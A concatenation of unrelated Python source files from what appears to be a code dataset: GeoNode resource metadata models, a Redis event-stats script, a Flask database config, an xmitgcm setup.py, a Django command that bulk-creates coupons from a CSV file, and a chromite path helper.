from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ValidationError
from django.conf import settings
from django.contrib.staticfiles.templatetags import staticfiles
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth import get_user_model
from django.db.models import signals
from django.core.files.storage import default_storage as storage
from django.core.files.base import ContentFile
from mptt.models import MPTTModel, TreeForeignKey
from polymorphic.models import PolymorphicModel
from polymorphic.managers import PolymorphicManager
from agon_ratings.models import OverallRating
from geonode.base.enumerations import ALL_LANGUAGES, \
HIERARCHY_LEVELS, UPDATE_FREQUENCIES, \
DEFAULT_SUPPLEMENTAL_INFORMATION, LINK_TYPES
from geonode.utils import bbox_to_wkt
from geonode.utils import forward_mercator
from geonode.security.models import PermissionLevelMixin
from taggit.managers import TaggableManager, _TaggableManager
from taggit.models import TagBase, ItemBase
from treebeard.mp_tree import MP_Node
from geonode.people.enumerations import ROLE_VALUES
logger = logging.getLogger(__name__)
class ContactRole(models.Model):
"""
ContactRole is an intermediate model to bind Profiles as Contacts to Resources and apply roles.
"""
resource = models.ForeignKey('ResourceBase')
contact = models.ForeignKey(settings.AUTH_USER_MODEL)
role = models.CharField(choices=ROLE_VALUES, max_length=255, help_text=_('function performed by the responsible '
'party'))
def clean(self):
"""
Make sure there is only one poc and author per resource
"""
if (self.role == self.resource.poc_role) or (self.role == self.resource.metadata_author_role):
contacts = self.resource.contacts.filter(contactrole__role=self.role)
if contacts.count() == 1:
# only allow this if we are updating the same contact
if self.contact != contacts.get():
raise ValidationError('There can be only one %s for a given resource' % self.role)
if self.contact.user is None:
# verify that any unbound contact is only associated to one resource
bounds = ContactRole.objects.filter(contact=self.contact).count()
if bounds > 1:
raise ValidationError('There can be one and only one resource linked to an unbound contact' % self.role)
elif bounds == 1:
# verify that if there was one already, it corresponds to this instance
if ContactRole.objects.filter(contact=self.contact).get().id != self.id:
raise ValidationError('There can be one and only one resource linked to an unbound contact'
% self.role)
class Meta:
unique_together = (("contact", "resource", "role"),)
class TopicCategory(models.Model):
"""
Metadata about high-level geographic data thematic classification.
It should reflect a list of codes from TC211
See: http://www.isotc211.org/2005/resources/Codelist/gmxCodelists.xml
<CodeListDictionary gml:id="MD_MD_TopicCategoryCode">
"""
identifier = models.CharField(max_length=255, default='location')
description = models.TextField(default='')
gn_description = models.TextField('GeoNode description', default='', null=True)
is_choice = models.BooleanField(default=True)
fa_class = models.CharField(max_length=64, default='fa-times')
def __unicode__(self):
return u"{0}".format(self.gn_description)
class Meta:
ordering = ("identifier",)
verbose_name_plural = 'Metadata Topic Categories'
class SpatialRepresentationType(models.Model):
"""
Metadata information about the spatial representation type.
It should reflect a list of codes from TC211
See: http://www.isotc211.org/2005/resources/Codelist/gmxCodelists.xml
<CodeListDictionary gml:id="MD_SpatialRepresentationTypeCode">
"""
identifier = models.CharField(max_length=255, editable=False)
description = models.CharField(max_length=255, editable=False)
gn_description = models.CharField('GeoNode description', max_length=255)
is_choice = models.BooleanField(default=True)
def __unicode__(self):
return self.gn_description
class Meta:
ordering = ("identifier",)
verbose_name_plural = 'Metadata Spatial Representation Types'
class RegionManager(models.Manager):
def get_by_natural_key(self, code):
return self.get(code=code)
class Region(MPTTModel):
# objects = RegionManager()
code = models.CharField(max_length=50, unique=True)
name = models.CharField(max_length=255)
parent = TreeForeignKey('self', null=True, blank=True, related_name='children')
def __unicode__(self):
return self.name
class Meta:
ordering = ("name",)
verbose_name_plural = 'Metadata Regions'
class MPTTMeta:
order_insertion_by = ['name']
class RestrictionCodeType(models.Model):
"""
Metadata information about the spatial representation type.
It should reflect a list of codes from TC211
See: http://www.isotc211.org/2005/resources/Codelist/gmxCodelists.xml
<CodeListDictionary gml:id="MD_RestrictionCode">
"""
identifier = models.CharField(max_length=255, editable=False)
description = models.TextField(max_length=255, editable=False)
gn_description = models.TextField('GeoNode description', max_length=255)
is_choice = models.BooleanField(default=True)
def __unicode__(self):
return self.gn_description
class Meta:
ordering = ("identifier",)
verbose_name_plural = 'Metadata Restriction Code Types'
class License(models.Model):
identifier = models.CharField(max_length=255, editable=False)
name = models.CharField(max_length=100)
abbreviation = models.CharField(max_length=20, null=True, blank=True)
description = models.TextField(null=True, blank=True)
url = models.URLField(max_length=2000, null=True, blank=True)
license_text = models.TextField(null=True, blank=True)
def __unicode__(self):
return self.name
@property
def name_long(self):
if self.abbreviation is None or len(self.abbreviation) == 0:
return self.name
else:
return self.name+" ("+self.abbreviation+")"
@property
def description_bullets(self):
if self.description is None or len(self.description) == 0:
return ""
else:
bullets = []
lines = self.description.split("\n")
for line in lines:
bullets.append("+ "+line)
return bullets
class Meta:
ordering = ("name", )
verbose_name_plural = 'Licenses'
class HierarchicalKeyword(TagBase, MP_Node):
node_order_by = ['name']
@classmethod
def dump_bulk_tree(cls, parent=None, keep_ids=True):
"""Dumps a tree branch to a python data structure."""
qset = cls._get_serializable_model().get_tree(parent)
ret, lnk = [], {}
for pyobj in qset:
serobj = serializers.serialize('python', [pyobj])[0]
# django's serializer stores the attributes in 'fields'
fields = serobj['fields']
depth = fields['depth']
fields['text'] = fields['name']
fields['href'] = fields['slug']
del fields['name']
del fields['slug']
del fields['path']
del fields['numchild']
del fields['depth']
if 'id' in fields:
# this happens immediately after a load_bulk
del fields['id']
newobj = {}
for field in fields:
newobj[field] = fields[field]
if keep_ids:
newobj['id'] = serobj['pk']
if (not parent and depth == 1) or\
(parent and depth == parent.depth):
ret.append(newobj)
else:
parentobj = pyobj.get_parent()
parentser = lnk[parentobj.pk]
if 'nodes' not in parentser:
parentser['nodes'] = []
parentser['nodes'].append(newobj)
lnk[pyobj.pk] = newobj
return ret
class TaggedContentItem(ItemBase):
content_object = models.ForeignKey('ResourceBase')
tag = models.ForeignKey('HierarchicalKeyword', related_name='keywords')
# see https://github.com/alex/django-taggit/issues/101
@classmethod
def tags_for(cls, model, instance=None):
if instance is not None:
return cls.tag_model().objects.filter(**{
'%s__content_object' % cls.tag_relname(): instance
})
return cls.tag_model().objects.filter(**{
'%s__content_object__isnull' % cls.tag_relname(): False
}).distinct()
class _HierarchicalTagManager(_TaggableManager):
def add(self, *tags):
str_tags = set([
t
for t in tags
if not isinstance(t, self.through.tag_model())
])
tag_objs = set(tags) - str_tags
# If str_tags has 0 elements Django actually optimizes that to not do a
# query. Malcolm is very smart.
existing = self.through.tag_model().objects.filter(
slug__in=str_tags
)
tag_objs.update(existing)
for new_tag in str_tags - set(t.slug for t in existing):
tag_objs.add(HierarchicalKeyword.add_root(name=new_tag))
for tag in tag_objs:
self.through.objects.get_or_create(tag=tag, **self._lookup_kwargs())
class ResourceBaseManager(PolymorphicManager):
def admin_contact(self):
# this assumes there is at least one superuser
superusers = get_user_model().objects.filter(is_superuser=True).order_by('id')
if superusers.count() == 0:
raise RuntimeError('GeoNode needs at least one admin/superuser set')
return superusers[0]
def get_queryset(self):
return super(ResourceBaseManager, self).get_queryset().non_polymorphic()
def polymorphic_queryset(self):
return super(ResourceBaseManager, self).get_queryset()
class ResourceBase(PolymorphicModel, PermissionLevelMixin, ItemBase):
"""
Base Resource Object loosely based on ISO 19115:2003
"""
VALID_DATE_TYPES = [(x.lower(), _(x)) for x in ['Creation', 'Publication', 'Revision']]
date_help_text = _('reference date for the cited resource')
date_type_help_text = _('identification of when a given event occurred')
edition_help_text = _('version of the cited resource')
abstract_help_text = _('brief narrative summary of the content of the resource(s)')
purpose_help_text = _('summary of the intentions with which the resource(s) was developed')
maintenance_frequency_help_text = _('frequency with which modifications and deletions are made to the data after '
'it is first produced')
keywords_help_text = _('commonly used word(s) or formalised word(s) or phrase(s) used to describe the subject '
'(space or comma-separated')
regions_help_text = _('keyword identifies a location')
restriction_code_type_help_text = _('limitation(s) placed upon the access or use of the data.')
constraints_other_help_text = _('other restrictions and legal prerequisites for accessing and using the resource or'
' metadata')
license_help_text = _('license of the dataset')
language_help_text = _('language used within the dataset')
category_help_text = _('high-level geographic data thematic classification to assist in the grouping and search of '
'available geographic data sets.')
spatial_representation_type_help_text = _('method used to represent geographic information in the dataset.')
temporal_extent_start_help_text = _('time period covered by the content of the dataset (start)')
temporal_extent_end_help_text = _('time period covered by the content of the dataset (end)')
data_quality_statement_help_text = _('general explanation of the data producer\'s knowledge about the lineage of a'
' dataset')
# internal fields
uuid = models.CharField(max_length=36)
owner = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True, related_name='owned_resource',
verbose_name=_("Owner"))
contacts = models.ManyToManyField(settings.AUTH_USER_MODEL, through='ContactRole')
title = models.CharField(_('title'), max_length=255, help_text=_('name by which the cited resource is known'))
date = models.DateTimeField(_('date'), default=datetime.datetime.now, help_text=date_help_text)
date_type = models.CharField(_('date type'), max_length=255, choices=VALID_DATE_TYPES, default='publication',
help_text=date_type_help_text)
edition = models.CharField(_('edition'), max_length=255, blank=True, null=True, help_text=edition_help_text)
abstract = models.TextField(_('abstract'), blank=True, help_text=abstract_help_text)
purpose = models.TextField(_('purpose'), null=True, blank=True, help_text=purpose_help_text)
maintenance_frequency = models.CharField(_('maintenance frequency'), max_length=255, choices=UPDATE_FREQUENCIES,
blank=True, null=True, help_text=maintenance_frequency_help_text)
keywords = TaggableManager(_('keywords'), through=TaggedContentItem, blank=True, help_text=keywords_help_text,
manager=_HierarchicalTagManager)
regions = models.ManyToManyField(Region, verbose_name=_('keywords region'), blank=True,
help_text=regions_help_text)
restriction_code_type = models.ForeignKey(RestrictionCodeType, verbose_name=_('restrictions'),
help_text=restriction_code_type_help_text, null=True, blank=True,
limit_choices_to=Q(is_choice=True))
constraints_other = models.TextField(_('restrictions other'), blank=True, null=True,
help_text=constraints_other_help_text)
license = models.ForeignKey(License, null=True, blank=True,
verbose_name=_("License"),
help_text=license_help_text)
language = models.CharField(_('language'), max_length=3, choices=ALL_LANGUAGES, default='eng',
help_text=language_help_text)
category = models.ForeignKey(TopicCategory, null=True, blank=True, limit_choices_to=Q(is_choice=True),
help_text=category_help_text)
spatial_representation_type = models.ForeignKey(SpatialRepresentationType, null=True, blank=True,
limit_choices_to=Q(is_choice=True),
verbose_name=_("spatial representation type"),
help_text=spatial_representation_type_help_text)
# Section 5
temporal_extent_start = models.DateTimeField(_('temporal extent start'), blank=True, null=True,
help_text=temporal_extent_start_help_text)
temporal_extent_end = models.DateTimeField(_('temporal extent end'), blank=True, null=True,
help_text=temporal_extent_end_help_text)
supplemental_information = models.TextField(_('supplemental information'), default=DEFAULT_SUPPLEMENTAL_INFORMATION,
help_text=_('any other descriptive information about the dataset'))
# Section 8
data_quality_statement = models.TextField(_('data quality statement'), blank=True, null=True,
help_text=data_quality_statement_help_text)
# Section 9
# see metadata_author property definition below
# Save bbox values in the database.
# This is useful for spatial searches and for generating thumbnail images and metadata records.
bbox_x0 = models.DecimalField(max_digits=19, decimal_places=10, blank=True, null=True)
bbox_x1 = models.DecimalField(max_digits=19, decimal_places=10, blank=True, null=True)
bbox_y0 = models.DecimalField(max_digits=19, decimal_places=10, blank=True, null=True)
bbox_y1 = models.DecimalField(max_digits=19, decimal_places=10, blank=True, null=True)
srid = models.CharField(max_length=255, default='EPSG:4326')
# CSW specific fields
csw_typename = models.CharField(_('CSW typename'), max_length=32, default='gmd:MD_Metadata', null=False)
csw_schema = models.CharField(_('CSW schema'),
max_length=64,
default='http://www.isotc211.org/2005/gmd',
null=False)
csw_mdsource = models.CharField(_('CSW source'), max_length=256, default='local', null=False)
csw_insert_date = models.DateTimeField(_('CSW insert date'), auto_now_add=True, null=True)
csw_type = models.CharField(_('CSW type'), max_length=32, default='dataset', null=False, choices=HIERARCHY_LEVELS)
csw_anytext = models.TextField(_('CSW anytext'), null=True, blank=True)
csw_wkt_geometry = models.TextField(_('CSW WKT geometry'),
null=False,
default='POLYGON((-180 -90,-180 90,180 90,180 -90,-180 -90))')
# metadata XML specific fields
metadata_uploaded = models.BooleanField(default=False)
metadata_uploaded_preserve = models.BooleanField(default=False)
metadata_xml = models.TextField(null=True,
default='<gmd:MD_Metadata xmlns:gmd="http://www.isotc211.org/2005/gmd"/>',
blank=True)
popular_count = models.IntegerField(default=0)
share_count = models.IntegerField(default=0)
featured = models.BooleanField(_("Featured"), default=False,
help_text=_('Should this resource be advertised in home page?'))
is_published = models.BooleanField(_("Is Published"), default=True,
help_text=_('Should this resource be published and searchable?'))
# fields necessary for the apis
thumbnail_url = models.TextField(null=True, blank=True)
detail_url = models.CharField(max_length=255, null=True, blank=True)
rating = models.IntegerField(default=0, null=True, blank=True)
def __unicode__(self):
return self.title
@property
def bbox(self):
return [self.bbox_x0, self.bbox_y0, self.bbox_x1, self.bbox_y1, self.srid]
@property
def bbox_string(self):
return ",".join([str(self.bbox_x0), str(self.bbox_y0), str(self.bbox_x1), str(self.bbox_y1)])
@property
def geographic_bounding_box(self):
return bbox_to_wkt(self.bbox_x0, self.bbox_x1, self.bbox_y0, self.bbox_y1, srid=self.srid)
@property
def license_light(self):
a = []
if (not (self.license.name is None)) and (len(self.license.name) > 0):
a.append(self.license.name)
if (not (self.license.url is None)) and (len(self.license.url) > 0):
a.append("("+self.license.url+")")
return " ".join(a)
@property
def license_verbose(self):
a = []
if (not (self.license.name_long is None)) and (len(self.license.name_long) > 0):
a.append(self.license.name_long+":")
if (not (self.license.description is None)) and (len(self.license.description) > 0):
a.append(self.license.description)
if (not (self.license.url is None)) and (len(self.license.url) > 0):
a.append("("+self.license.url+")")
return " ".join(a)
def keyword_list(self):
return [kw.name for kw in self.keywords.all()]
def keyword_slug_list(self):
return [kw.slug for kw in self.keywords.all()]
def region_name_list(self):
return [region.name for region in self.regions.all()]
def spatial_representation_type_string(self):
if hasattr(self.spatial_representation_type, 'identifier'):
return self.spatial_representation_type.identifier
else:
if hasattr(self, 'storeType'):
if self.storeType == 'coverageStore':
return 'grid'
return 'vector'
else:
return None
@property
def keyword_csv(self):
keywords_qs = self.get_real_instance().keywords.all()
if keywords_qs:
return ','.join([kw.name for kw in keywords_qs])
else:
return ''
def set_latlon_bounds(self, box):
"""
Set the four bounds in lat lon projection
"""
self.bbox_x0 = box[0]
self.bbox_x1 = box[1]
self.bbox_y0 = box[2]
self.bbox_y1 = box[3]
def set_bounds_from_center_and_zoom(self, center_x, center_y, zoom):
"""
Calculate zoom level and center coordinates in mercator.
"""
self.center_x = center_x
self.center_y = center_y
self.zoom = zoom
deg_len_equator = 40075160 / 360
# covert center in lat lon
def get_lon_lat():
wgs84 = Proj(init='epsg:4326')
mercator = Proj(init='epsg:3857')
lon, lat = transform(mercator, wgs84, center_x, center_y)
return lon, lat
# calculate the degree length at this latitude
def deg_len():
lon, lat = get_lon_lat()
return math.cos(lat) * deg_len_equator
lon, lat = get_lon_lat()
# taken from http://wiki.openstreetmap.org/wiki/Zoom_levels
# it might be not precise but enough for the purpose
distance_per_pixel = 40075160 * math.cos(lat)/2**(zoom+8)
# calculate the distance from the center of the map in degrees
# we use the calculated degree length on the x axis and the
# normal degree length on the y axis assumin that it does not change
# Assuming a map of 1000 px of width and 700 px of height
distance_x_degrees = distance_per_pixel * 500 / deg_len()
distance_y_degrees = distance_per_pixel * 350 / deg_len_equator
self.bbox_x0 = lon - distance_x_degrees
self.bbox_x1 = lon + distance_x_degrees
self.bbox_y0 = lat - distance_y_degrees
self.bbox_y1 = lat + distance_y_degrees
def set_bounds_from_bbox(self, bbox):
"""
Calculate zoom level and center coordinates in mercator.
"""
self.set_latlon_bounds(bbox)
minx, miny, maxx, maxy = [float(c) for c in bbox]
x = (minx + maxx) / 2
y = (miny + maxy) / 2
(center_x, center_y) = forward_mercator((x, y))
xdiff = maxx - minx
ydiff = maxy - miny
zoom = 0
if xdiff > 0 and ydiff > 0:
width_zoom = math.log(360 / xdiff, 2)
height_zoom = math.log(360 / ydiff, 2)
zoom = math.ceil(min(width_zoom, height_zoom))
self.zoom = zoom
self.center_x = center_x
self.center_y = center_y
def download_links(self):
"""assemble download links for pycsw"""
links = []
for url in self.link_set.all():
if url.link_type == 'metadata': # avoid recursion
continue
if url.link_type == 'html':
links.append((self.title, 'Web address (URL)', 'WWW:LINK-1.0-http--link', url.url))
elif url.link_type in ('OGC:WMS', 'OGC:WFS', 'OGC:WCS'):
links.append((self.title, url.name, url.link_type, url.url))
else:
description = '%s (%s Format)' % (self.title, url.name)
links.append((self.title, description, 'WWW:DOWNLOAD-1.0-http--download', url.url))
return links
def get_tiles_url(self):
"""Return URL for Z/Y/X mapping clients or None if it does not exist.
"""
try:
tiles_link = self.link_set.get(name='Tiles')
except Link.DoesNotExist:
return None
else:
return tiles_link.url
def get_legend(self):
"""Return Link for legend or None if it does not exist.
"""
try:
legends_link = self.link_set.get(name='Legend')
except Link.DoesNotExist:
return None
except Link.MultipleObjectsReturned:
return None
else:
return legends_link
def get_legend_url(self):
"""Return URL for legend or None if it does not exist.
The legend can be either an image (for Geoserver's WMS)
or a JSON object for ArcGIS.
"""
legend = self.get_legend()
if legend is None:
return None
return legend.url
def get_ows_url(self):
"""Return URL for OGC WMS server None if it does not exist.
"""
try:
ows_link = self.link_set.get(name='OGC:WMS')
except Link.DoesNotExist:
return None
else:
return ows_link.url
def get_thumbnail_url(self):
"""Return a thumbnail url.
It could be a local one if it exists, a remote one (WMS GetImage) for example
or a 'Missing Thumbnail' one.
"""
local_thumbnails = self.link_set.filter(name='Thumbnail')
if local_thumbnails.count() > 0:
return local_thumbnails[0].url
remote_thumbnails = self.link_set.filter(name='Remote Thumbnail')
if remote_thumbnails.count() > 0:
return remote_thumbnails[0].url
return staticfiles.static(settings.MISSING_THUMBNAIL)
def has_thumbnail(self):
"""Determine if the thumbnail object exists and an image exists"""
return self.link_set.filter(name='Thumbnail').exists()
def save_thumbnail(self, filename, image):
upload_to = 'thumbs/'
upload_path = os.path.join('thumbs/', filename)
if storage.exists(upload_path):
# Delete if exists otherwise the (FileSystemStorage) implementation
# will create a new file with a unique name
storage.delete(os.path.join(upload_path))
storage.save(upload_path, ContentFile(image))
url_path = os.path.join(settings.MEDIA_URL, upload_to, filename).replace('\\', '/')
url = urljoin(settings.SITEURL, url_path)
Link.objects.get_or_create(resource=self,
url=url,
defaults=dict(
name='Thumbnail',
extension='png',
mime='image/png',
link_type='image',
))
ResourceBase.objects.filter(id=self.id).update(
thumbnail_url=url
)
def set_missing_info(self):
"""Set default permissions and point of contacts.
It is mandatory to call it from descendant classes
but hard to enforce technically via signals or save overriding.
"""
from guardian.models import UserObjectPermission
logger.debug('Checking for permissions.')
# True if every key in the get_all_level_info dict is empty.
no_custom_permissions = UserObjectPermission.objects.filter(
content_type=ContentType.objects.get_for_model(self.get_self_resource()),
object_pk=str(self.pk)
).exists()
if not no_custom_permissions:
logger.debug('There are no permissions for this object, setting default perms.')
self.set_default_permissions()
if self.owner:
user = self.owner
else:
user = ResourceBase.objects.admin_contact().user
if self.poc is None:
self.poc = user
if self.metadata_author is None:
self.metadata_author = user
def maintenance_frequency_title(self):
return [v for i, v in enumerate(UPDATE_FREQUENCIES) if v[0] == self.maintenance_frequency][0][1].title()
def language_title(self):
return [v for i, v in enumerate(ALL_LANGUAGES) if v[0] == self.language][0][1].title()
def _set_poc(self, poc):
# reset any poc assignation to this resource
ContactRole.objects.filter(role='pointOfContact', resource=self).delete()
# create the new assignation
ContactRole.objects.create(role='pointOfContact', resource=self, contact=poc)
def _get_poc(self):
try:
the_poc = ContactRole.objects.get(role='pointOfContact', resource=self).contact
except ContactRole.DoesNotExist:
the_poc = None
return the_poc
poc = property(_get_poc, _set_poc)
def _set_metadata_author(self, metadata_author):
# reset any metadata_author assignation to this resource
ContactRole.objects.filter(role='author', resource=self).delete()
# create the new assignation
ContactRole.objects.create(role='author', resource=self, contact=metadata_author)
def _get_metadata_author(self):
try:
the_ma = ContactRole.objects.get(role='author', resource=self).contact
except ContactRole.DoesNotExist:
the_ma = None
return the_ma
metadata_author = property(_get_metadata_author, _set_metadata_author)
objects = ResourceBaseManager()
class Meta:
# custom permissions,
# add, change and delete are standard in django-guardian
permissions = (
('view_resourcebase', 'Can view resource'),
('change_resourcebase_permissions', 'Can change resource permissions'),
('download_resourcebase', 'Can download resource'),
('publish_resourcebase', 'Can publish resource'),
('change_resourcebase_metadata', 'Can change resource metadata'),
)
class LinkManager(models.Manager):
"""Helper class to access links grouped by type
"""
def data(self):
return self.get_queryset().filter(link_type='data')
def image(self):
return self.get_queryset().filter(link_type='image')
def download(self):
return self.get_queryset().filter(link_type__in=['image', 'data'])
def metadata(self):
return self.get_queryset().filter(link_type='metadata')
def original(self):
return self.get_queryset().filter(link_type='original')
def geogig(self):
return self.get_queryset().filter(name__icontains='geogig')
def ows(self):
return self.get_queryset().filter(link_type__in=['OGC:WMS', 'OGC:WFS', 'OGC:WCS'])
class Link(models.Model):
"""Auxiliary model for storing links for resources.
This helps avoiding the need for runtime lookups
to the OWS server or the CSW Catalogue.
There are four types of links:
* original: For uploaded files (Shapefiles or GeoTIFFs)
* data: For WFS and WCS links that allow access to raw data
* image: For WMS and TMS links
* metadata: For CSW links
* OGC:WMS: for WMS service links
* OGC:WFS: for WFS service links
* OGC:WCS: for WCS service links
"""
resource = models.ForeignKey(ResourceBase)
extension = models.CharField(max_length=255, help_text=_('For example "kml"'))
link_type = models.CharField(max_length=255, choices=[(x, x) for x in LINK_TYPES])
name = models.CharField(max_length=255, help_text=_('For example "View in Google Earth"'))
mime = models.CharField(max_length=255, help_text=_('For example "text/xml"'))
url = models.TextField(max_length=1000)
objects = LinkManager()
def __str__(self):
return '%s link' % self.link_type
def resourcebase_post_save(instance, *args, **kwargs):
"""
Used to fill any additional fields after the save.
Has to be called by the children
"""
ResourceBase.objects.filter(id=instance.id).update(
thumbnail_url=instance.get_thumbnail_url(),
detail_url=instance.get_absolute_url(),
csw_insert_date=datetime.datetime.now())
instance.set_missing_info()
# we need to remove stale links
for link in instance.link_set.all():
if link.name == "External Document":
if link.resource.doc_url != link.url:
link.delete()
else:
if urlsplit(settings.SITEURL).hostname not in link.url:
link.delete()
def rating_post_save(instance, *args, **kwargs):
"""
Used to fill the average rating field on OverallRating change.
"""
ResourceBase.objects.filter(id=instance.object_id).update(rating=instance.rating)
signals.post_save.connect(rating_post_save, sender=OverallRating)
| gpl-3.0 | 8,784,097,328,487,510,000 | 39.583235 | 120 | 0.616367 | false | 4.100931 | false | false | false |
orkestra-studios/nebuu-service | stats.py | 1 | 2397 | from datetime import date, datetime
from services import *
from collections import defaultdict
import sys
CATEGORIES = ["populerkultur", "yazmevsimi", "kismevsimi", "yesilcam", "emojiler", "gol", "turkdizileri", "evlilik", "para", "kultursanat", "sesinicikar", "ikililer", "okul", "taklit", "osmanli", "markalar", "parti", "neyapiyorum", "ruhhali", "2000ler", "cizgifilm", "hayvanlar", "90lar", "sarkilar", "muzisyenler", "meslekler", "2015geyikleri", "superkahramanlar", "filmler", "diziler", "ankara", "vucudumuzutaniyalim", "yermekan", "mutfak", "istanbul", "sehirler", "2014", "spordunyasi", "oyunlar", "tarih", "futboltakimlari", "bayram", "2013", "teknolojibilgisayar"]
OPEN_KEY = "co.orkestra.nebuu.event.open"
PLAY_KEY = "co.orkestra.nebuu.event.play"
BUY_KEY = "co.orkestra.nebuu.event.buy"
def get_opens(rdb, start,end=None):
OPEN_KEY = "co.orkestra.nebuu.event.open"
start_s = int(datetime.strptime(start, '%d-%m-%Y').strftime('%s'))
end_s = int(datetime.strptime(end, '%d-%m-%Y').strftime('%s')) if end else start_s+86399
dspan = [start_s, end_s]
load = lambda key: map(
json.loads,
rdb.smembers(key)
)
opens_raw = load(OPEN_KEY)
opened = set(
map(lambda e: e['uid'],
filter(
lambda e: 'uid' in e and 'when' in e and dspan[0]<e['when']<dspan[1],
opens_raw
)
)
)
return len(opened)
def get_stats(for_date):
dspan = [int(datetime.strptime(for_date, '%d-%m-%Y').strftime('%s'))]
dspan += [dspan[0]+86400]
load = lambda key: map(
json.loads,
rdb.smembers(key)
)
opened = set(
map(lambda e: e['uid'],
filter(
lambda e: 'uid' in e and 'when' in e and dspan[0]<e['when']<dspan[1],
load(OPEN_KEY)
)
)
)
played = defaultdict(int)
for e in []:#load(PLAY_KEY):
try:
assert(e['category'] in CATEGORIES)
played[e['category']] += 1
except: pass
played['total'] = sum(played.values())
return len(opened),played
if __name__ == '__main__':
dt = sys.argv[1]
try:
dtt = sys.argv[2]
except: dtt = None
stats = get_opens(dt, dtt)
print 'opened:', stats[0]
| gpl-3.0 | 4,208,475,431,737,372,000 | 33.242857 | 569 | 0.54902 | false | 2.91961 | false | false | false |
danmilon/fragofonias | app.py | 1 | 1092 | from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
from flask.json import JSONEncoder
from datetime import date, datetime
import os
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://%s:%s@localhost/csa?charset=utf8' % (
os.environ['CSA_DB_USERNAME'], os.environ['CSA_DB_PASSWORD']
)
sqlite_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'db.sqlite')
app.config['SQLALCHEMY_BINDS'] = {
'wallet': 'sqlite:///' + sqlite_path
}
app.config['SQLALCHEMY_ECHO'] = False
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
db = SQLAlchemy(app)
class CustomJSONEncoder(JSONEncoder):
def default(self, obj):
try:
if isinstance(obj, date):
return JSONEncoder.default(
self,
datetime(obj.year, obj.month, obj.day))
iterable = iter(obj)
except TypeError:
pass
else:
return list(iterable)
return JSONEncoder.default(self, obj)
app.json_encoder = CustomJSONEncoder
| mit | 2,123,392,683,379,252,500 | 28.513514 | 94 | 0.624542 | false | 3.580328 | false | false | false |
sambarluc/xmitgcm | setup.py | 1 | 1468 | #!/usr/bin/env python
import os
import re
import sys
import warnings
from setuptools import setup, find_packages
VERSION = '0.2.1'
DISTNAME = 'xmitgcm'
LICENSE = 'Apache'
AUTHOR = 'Ryan Abernathey'
AUTHOR_EMAIL = '[email protected]'
URL = 'https://github.com/xgcm/xmitgcm'
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Intended Audience :: Science/Research',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Scientific/Engineering',
]
INSTALL_REQUIRES = ['xarray >= 0.8.2', 'dask >= 0.12']
SETUP_REQUIRES = ['pytest-runner']
TESTS_REQUIRE = ['pytest >= 2.8', 'coverage']
DESCRIPTION = "Read MITgcm mds binary files into xarray"
def readme():
with open('README.rst') as f:
return f.read()
setup(name=DISTNAME,
version=VERSION,
license=LICENSE,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
classifiers=CLASSIFIERS,
description=DESCRIPTION,
long_description=readme(),
install_requires=INSTALL_REQUIRES,
setup_requires=SETUP_REQUIRES,
tests_require=TESTS_REQUIRE,
url=URL,
packages=find_packages())
| mit | 8,516,770,780,736,620,000 | 27.784314 | 57 | 0.658719 | false | 3.50358 | false | false | false |
EuroPython/epcon | p3/management/commands/create_bulk_coupons.py | 1 | 2939 |
""" Create a batch of single use discount coupons from a CSV file.
Parameters: <conference> <csv-file>
Creates coupons based on the CSV file contents:
code - coupon code
max_usage - max. number of uses
items_per_usage - max number of items per use
value - value of the coupon in percent
description - description
fares - comma separated list of included fares
Use --dry-run to test drive the script.
"""
import sys
import csv
from django.core.management.base import BaseCommand, CommandError
from django.db import transaction
from conference import models as cmodels
from assopy.models import Coupon
###
class Command(BaseCommand):
args = '<conference> <count>'
# Dry run ?
dry_run = False
def add_arguments(self, parser):
# Positional arguments
parser.add_argument('conference')
parser.add_argument('csv')
# Named (optional) arguments
parser.add_argument('--dry-run',
action='store_true',
dest='dry_run',
default=False,
help='Do everything except create the coupons')
@transaction.atomic
def handle(self, *args, **options):
conference = cmodels.Conference.objects.get(code=options['conference'])
self.dry_run = options.get('dry_run', False)
csv_filename = options['csv']
# Get set of existing coupon codes
all_codes = set(c['code'] for c in Coupon.objects\
.filter(conference=conference.code)\
.values('code'))
# Valid fares (conference fares only)
all_fares = cmodels.Fare.objects\
.filter(conference=conference.code)
# Create coupons
if csv_filename == 'stdin':
csv_file = sys.stdin
else:
csv_file = open(csv_filename)
with csv_file:
reader = csv.DictReader(csv_file)
for row in reader:
code = row['code'].strip()
if not code:
# Skip lines without code
continue
if code in all_codes:
# Skip coupons which already exist
print ('Coupon %r already exists - skipping' % code)
continue
c = Coupon(conference=conference)
c.code = code
c.max_usage = int(row.get('max_usage', 1))
c.items_per_usage = int(row.get('items_per_usage', 1))
c.value = row['value']
c.description = row.get('description', '')
if not self.dry_run:
c.save()
c.fares = all_fares.filter(
code__in = [x.strip()
for x in row['fares'].split(',')])
print ('Coupond %r created' % c.code)
| bsd-2-clause | 2,320,317,015,816,716,000 | 30.945652 | 79 | 0.539639 | false | 4.309384 | false | false | false |
mxOBS/deb-pkg_trusty_chromium-browser | third_party/chromite/lib/paygen/fixup_path.py | 1 | 1342 | # Copyright (c) 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Helper for other scripts that need a PYTHONPATH entry for crostools.
Generally used by import statements of the form:
from chromite.lib.paygen import foo
from crostools.scripts import foo
"""
# pylint: disable=bad-continuation
from __future__ import print_function
import os.path
import sys
# Find the correct root path to insert into sys.path for importing
# modules in this source.
CROSTOOLS_ROOT = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..'))
CROSTOOLS_PATH_ROOT = os.path.dirname(CROSTOOLS_ROOT)
